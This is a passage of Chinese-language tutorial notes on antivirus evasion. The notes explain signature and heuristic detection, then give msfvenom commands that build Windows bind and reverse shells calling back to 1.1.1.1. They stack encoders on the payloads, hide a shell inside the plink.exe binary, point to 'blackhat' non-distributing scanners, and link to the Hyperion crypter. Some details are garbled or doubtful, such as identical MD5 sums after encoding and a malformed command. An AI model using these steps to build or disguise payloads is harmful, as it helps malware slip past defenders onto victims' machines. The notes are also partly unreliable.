第17章 免杀

杀毒软件

叫杀毒软件变成了防病毒软件

  • 为什么叫防病毒软件
    • 应为做的黑客做出来木马病毒运行在很底层
      • 在开机运行之前木马病毒就在引导的时候已经启动了所以杀毒软件杀不了他
    • 企业的防病毒软件
      • 企业的防病毒软件都有一个单独的控制台
      • 控制台就可以控制企业下面的所以设备的安全

杀毒软件的原理

  1. 杀毒软件的有一个病毒库,里面存放着特征码
  2. 基于对二进制的文件或者对数据包进行还原后的里面的特征字符进行比较
  3. 还有行为分析比如修改你的注册表,插入进程里面,修改你的文件等等等方法就叫<启发式>

免杀技术

免杀技术有两大种

现在还有的黑客进行逆向分析杀毒软件,看你的杀毒软件是怎么进行分析的

  1. 修改
    1. 如果一个黑客知道那个杀毒软件的厂商,定义病毒的特点
      就可以进行用二进行修改,替换等等等达到免杀技术
  2. 2.加密技术(crypter)
    1. 通过加密使得特征字符不可读,来逃避查杀
    2. 还有叫木马程序注入到MP3里面,还照片里面

FUD是全免杀技术

查杀网站

  1. 下面是明查杀网站,他们会共享给杀毒软件,进行分享然后在加入特征库
    https://www.virustotal.com/
    http://www.virscan.org/
  2. 搞黑的
    https://nodistribute.com/
    http://viruscheckmate.com/check/

生成木马

生成反弹shell

1
msfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -o a.exe

-p 选择一个绑定tcp端口的shell ,-a 选择操作系统的架构
--platform 指定的平台,win就是windows系统
-f以exe格式输出 -o输出成a.exe

加密编码反弹 shell

1
msfvenom -p windows/shell/bind_tcp lhost=1.1.1.1lport=4444 -f raw -e x86/shikata_ga_nai -i 5 | msfvenom -a x86 --platform windows -e x86/countdown -i 8  -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -b '\x00' -f exe -o b.exe

raw进行加密编码 , -e是指定的是x86/shikata_ga_nai模块
-i 5就是这个x86/shikata_ga_nai模块加密5次 ,在用管道在用x86/countdown模块进行8次加密,在用x86/shikata_ga_nai模块在加密9次
-b 过滤字符
生成
在这里插入图片描述
发现加密和不加密的大小一样,看一下md5是一样的
用md5sum工具在这里插入图片描述
strings工具可以查看程序可读的内容
在这里插入图片描述

查看一下用在线病毒查杀看一下加密和不加密的

在线查杀病毒就是居于特征码的,在系统完全安装杀毒软件不这个要准确

  1. 查看一下没有加密的 有49个有25个检查出了了
    在这里插入图片描述
  2. 查看一下加了密的 有49个有25个检查出了了,效果几乎一样
    在这里插入图片描述

利用模板隐藏 shell

利用无害的应用程序作为模板,叫恶意的代码附着上去

利用模板隐藏 shell

1
msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -o c.exe

-x 指定一个模板/usr/share/windows-binaries/plink.exe就是kali自带的win系统的执行程序
其他参数上面说
在这里插入图片描述

模板隐藏 shell进行加密

1
msfvenom -p windows/shell/bind_tcp -x /usr/share/windows-binaries/plink.exe lhost=1.1.1.1 lport=4444 -e x86/shikata_ga_nai -i 5 -a x86 --platform win -f exe > d.exe

查看一下用在线病毒查杀看一下加密和不加密的

  1. 查看一下没有加密的 有49个有21个检查出了了
    在这里插入图片描述
  2. 查看一下加了密的 有49个有21个检查出了了,效果几乎一样
    在这里插入图片描述

软件保护

软件开发商为保护版权,采用的混淆和加密技术避免盗版逆向软件

  1. Hyperion (32bit PE 程序加密器)工具
    他是专门针对32位的PE程序
    他有两个模块Crypter (加密器)和Container(解密器)
    下载地址在有很个个版本:https://github.com/nullsecuritynet/tools/tree/master/binary/hyperion/release